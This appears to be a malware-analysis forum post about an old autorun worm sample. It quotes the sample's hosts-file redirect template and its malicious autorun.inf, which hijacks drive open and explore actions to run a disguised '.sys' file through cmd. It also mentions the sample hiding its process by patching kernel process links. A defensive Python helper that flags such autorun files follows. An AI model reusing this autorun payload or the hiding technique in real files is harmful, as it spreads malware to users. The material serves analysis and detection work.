A forum for reverse engineering, OS internals and malware analysis
thisisu wrote: I think this belongs here, sorry if it should be in its own topic. Well, it is an old C++ autorunner with an AV blacklist and hosts data file modification. However, it has a small interesting feature (only works on XP and 2003 RTM). It hides its own process from the process list by patching EPROCESS ActiveProcessLinks with NtSystemDebugControl calls.
https://www.virustotal.com/en/file/d761 ... 369960479/
MD5: ff273462480a65f7601809af5a0378d1
http://www.microsoft.com/security/porta ... 2fSlenfbot
Was on the same machine that also had Palevo/Lime
127.0.0.1 %s
\autorun.inf
[aUTOrUN]
useautoplay=1
;?ВX?лтсLLЭмIL?Н?Г?
sHELL\\explore\\\command=cmd /c start "" "CACHE-19204730\comd.sys"
;ЭмIL?Н?Г??ВX?лтсLL
sHELL\\open\\\command=cmd /c start "" "CACHE-19204730\comd.sys"
;OOмБГ?D
action=Open folder to view files using Windows Explorer
н?ИГТv
icon=%SystemRoot%\system32\SHELL32.dll,4
;??Cd
open=cmd /c start "" "CACHE-19204730\comd.sys"
:nop
;M?Ц???В
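As an added example (not code from the post, and not from the sample), a small Python triage helper that reads an autorun.inf the way the post's sample abuses it: mixed-case section and key names, ';' comment lines stuffed with binary garbage, doubled backslashes in the shell verb keys, and a launch command that runs a ".sys" file through cmd.exe. The embedded SAMPLE_AUTORUN is constructed to mirror the file quoted above; collapsing backslash runs in key names is a normalisation for matching and is assumed here, not a claim about how Windows itself parses them.

```python
import re

# Constructed sample modelled on the autorun.inf quoted in the post.
SAMPLE_AUTORUN = (
    "[aUTOrUN]\r\n"
    "useautoplay=1\r\n"
    ";?\u0412X?\u043b\u0442\u0441LL\r\n"            # binary garbage in a comment
    'sHELL\\\\explore\\\\\\command=cmd /c start "" "CACHE-19204730\\comd.sys"\r\n'
    'sHELL\\\\open\\\\\\command=cmd /c start "" "CACHE-19204730\\comd.sys"\r\n'
    "action=Open folder to view files using Windows Explorer\r\n"
    "icon=%SystemRoot%\\system32\\SHELL32.dll,4\r\n"
    'open=cmd /c start "" "CACHE-19204730\\comd.sys"\r\n'
    ":nop\r\n"
)

def parse_autorun(text):
    """Return {key: value} for the [autorun] section: section name and keys
    compared case-insensitively, ';' lines skipped, and runs of backslashes
    in key names collapsed to one (assumption: done only so keys can be matched)."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                                  # comment, incl. garbage lines
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[re.sub(r"\\+", r"\\", key.strip().lower())] = value.strip()
    return entries

LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command", "shell\\explore\\command")
ODD_EXTENSIONS = (".sys", ".dll", ".dat", ".tmp")   # never a legitimate launch target

def assess_autorun(text):
    """Return a list of findings explaining why the autorun.inf looks malicious."""
    entries, findings = parse_autorun(text), []
    for key in LAUNCH_KEYS:
        value = entries.get(key)
        if value is None:
            continue
        low = value.lower()
        if low.startswith(("cmd ", "cmd.exe")) or "%comspec%" in low:
            findings.append(f"{key}: launches through cmd.exe ({value!r})")
        # the real target is the last non-empty quoted token, else the last word
        quoted = [q for q in re.findall(r'"([^"]*)"', value) if q.strip()]
        target = quoted[-1] if quoted else (value.split() or [""])[-1]
        if target.lower().endswith(ODD_EXTENSIONS):
            findings.append(f"{key}: executes a non-program extension ({target!r})")
    if "shell\\open\\command" in entries and "shell\\explore\\command" in entries:
        findings.append("both Open and Explore context-menu verbs are hijacked")
    return findings
```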